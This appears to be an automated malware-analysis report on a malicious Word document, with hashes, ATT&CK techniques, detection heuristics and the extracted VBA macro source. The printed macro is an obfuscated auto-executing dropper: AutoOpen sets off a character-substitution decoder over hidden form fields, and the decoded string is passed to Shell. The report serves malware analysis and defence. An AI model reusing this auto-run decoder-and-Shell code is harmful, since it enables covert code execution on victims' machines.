Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 28b6fc2bee80bd7e…

MALICIOUS

Office (OLE)

Size: 209.0 KB
Created: 2018-11-30 13:04:00
Authoring application: Microsoft Office Word
First seen: 2019-09-30
MD5: a88a43f21136c7cfe6b54f041bc1c056
SHA-1: d5f030a1559ac0e4d4da828cdd2f2fc7f66b53bd
SHA-256: 28b6fc2bee80bd7e66950d7f2e75d26b1d39e17c15171f813a0e75d9ab049ec9
Risk Score: 202

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros. An Autoopen macro is present and calls the PageAllForms procedure with the string 'save', assembled at runtime by concatenating 'sa' + 've'. This suggests an attempt to execute arbitrary code, likely to download and execute a secondary payload. The Shell() call in the VBA code and the AutoOpen macro are critical indicators of malicious intent.

Heuristics (6)

  • ClamAV: Doc.Malware.00536d-6769015-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Malware.00536d-6769015-0
  • VBA macros detected [medium; 2 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA [critical] (OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind        Source                                               Size
macros.bas  vba-macro   oletools.olevba.extract_macros (decoded VBA source)  2772 bytes
SHA-256: dd397c19478e22c45304ab336dce5508a79ae63ca065111a06ed988bdf006d4b

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Autoopen()
Dim st1 As String
st1 = "sa" + "ve"
PageAllForms st1
End Sub




Attribute VB_Name = "Form1"
Attribute VB_Base = "0{18598BD2-9617-44D3-8A8F-33A406A79DBE}{61FD6585-2F0E-4C38-A83C-524941834E73}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub ComboBox1_Change()

End Sub

Private Sub LastText_Change()
Dim lev2 As Integer
lev2 = Len(Form1.LastText)
Dim lev1 As String
lev1 = "A"
fh = "2"
lang_xw2 lev2
End Sub


Private Sub EditText1_Change()
Dim ind1 As String
ind1 = "1" + "001"
End Sub

Private Sub CommandButton1_Click()

End Sub


Private Sub CommandButton2_Click()

End Sub

Private Sub TextBox1_Change()
Dim s As String
s = " "
s = s + Form1.Text1
If Len(s) = 63 Then lang_xot
End Sub


Attribute VB_Name = "Module1"
Sub red_fix(ByRef b1, ByRef control, Cell1)
log2 = 1
With Form1
log2 = Len(.Text1)
If b1 < log2 Then
b = ""
doc_print_body .Text1, b1, b
If Cell1 <> b Then
b1 = b1 + 1
red_fix b1, control, Cell1
Else
control = b1
End If
End If
End With
End Sub


Sub DataFindChars(ext1, ByRef state_max)
Dim m1 As Integer
m1 = -1
state_max = ""
If ext1 = m1 Then
ext1 = m1
End If
If ext1 < 1 Then
doc_print_body Form1.Text1, Len(Form1.Text1) + ext1, state_max
Else
doc_print_body Form1.Text1, ext1, state_max
End If
End Sub

Sub diggites_replace(C1, ByRef op)
op = ""
st1 = 1
replacediggites st1, op, C1
End Sub


Sub replacediggites(ByRef pointA, ByRef need, later)
f_str = Len(later)
If pointA <= f_str Then
ch = ""
doc_print_body later, pointA, ch
idial = 1
strings_attached ch, idial
st = ""
DataFindChars idial - 2, st
need = need + st
pointA = pointA + 1
replacediggites pointA, need, later
End If
End Sub

Sub PageAllForms(s1)
s1 = s1 + "OK"
Form1.TextBox1 = s1
End Sub

Sub doc_print_body(a1, pB, ByRef rmin)
s1 = Left(a1, pB)
s1 = s1 + ""
rmin = Right(s1, 1)
End Sub

Sub lang_xot()
Dim str2 As String
diggites_replace Form1.date1, str2
Form1.EditText1 = str2
str2 = str2 + ""
Form1.LastText = str2
End Sub

Sub lang_xw2(m)
Dim j As Integer
Dim str1 As String
With Form1
j = 517 - m
str1 = "" + .LastText
End With
If 0 = j Then Shell str1, j
End Sub

Sub strings_attached(per2, ByRef arg1)
arg1 = 0
sb1 = 1
red_fix sb1, arg1, per2
End Sub